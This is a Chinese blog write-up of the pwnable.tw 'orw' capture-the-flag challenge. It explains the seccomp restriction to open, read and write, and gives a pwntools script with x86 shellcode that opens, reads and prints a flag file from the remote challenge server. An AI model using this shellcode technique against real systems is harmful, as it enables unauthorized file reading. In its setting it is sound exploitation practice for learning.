pwnable.tw - orw
本文共 797 字,大约阅读时间需要 2 分钟。
简单概览
提示仅允许有限的系统调用 open read write 函数
程序运行
检查安全措施
程序
在 IDA 中反编译可见:
函数 orw_seccomp 反编译: 
程序从终端读入内容,存放在 shellcode,然后执行该命令
所以大体过程为先 open 文件,然后 read 读出内容,再 write 打印到终端
from pwn import *open_shellcode = "xor ecx,ecx;xor edx,edx;mov eax,0x5;push 0x00006761;push 0x6c662f77;push 0x726f2f65;push 0x6d6f682f;mov ebx,esp;int 0x80;"read_shellcode = "mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x40;int 0x80;"write_shellcode = "mov eax,0x4;mov ebx,0x1;mov edx,0x40;int 0x80;"shellcode = open_shellcode + read_shellcode + write_shellcodepayload = asm(shellcode)io = remote("chall.pwnable.tw", 10001)io.recvuntil("shellcode:")io.sendline(payload)print io.recv()io.interactive() /home/orw/flag 转换为 16 进制为 2f686f6d652f6f72772f666c6167,即压栈数据,还要补零
执行就可以得到 flag
转载地址:http://ctqai.baihongyu.com/
你可能感兴趣的文章
阿里规范(一)关于CountDownLatch和ThreadLocalRandom的详解(带测试代码)
查看>>
Mysql 函数 STR_TO_DATE
查看>>
Commons CLI 使用介绍
查看>>
Mybatis 缓存实现原理——案例实践
查看>>
Mybatis 缓存实现原理
查看>>
怎么提升SQL查询效率
查看>>
预编译防止sql注入
查看>>
覆盖equals方法时总是要覆盖hashCode
查看>>
clone详解
查看>>
【Java并发编程实战】——AbstractQueuedSynchronizer源码分析(一)
查看>>
【Java并发编程实战】——并发编程基础
查看>>
【Java并发编程实战】——Java内存模型与线程
查看>>
Java复制文件的4种方式
查看>>
mysql的JDBC连接工具类
查看>>
利用多线程(用到原子类AtomicInteger)往数据库批量插入大量数据
查看>>
多个线程操作数组
查看>>
定长线程池的应用
查看>>
ArrayBlockingQueue的简单使用
查看>>
Git 常用命令总结(一)
查看>>
Git 常用命令总结(二)
查看>>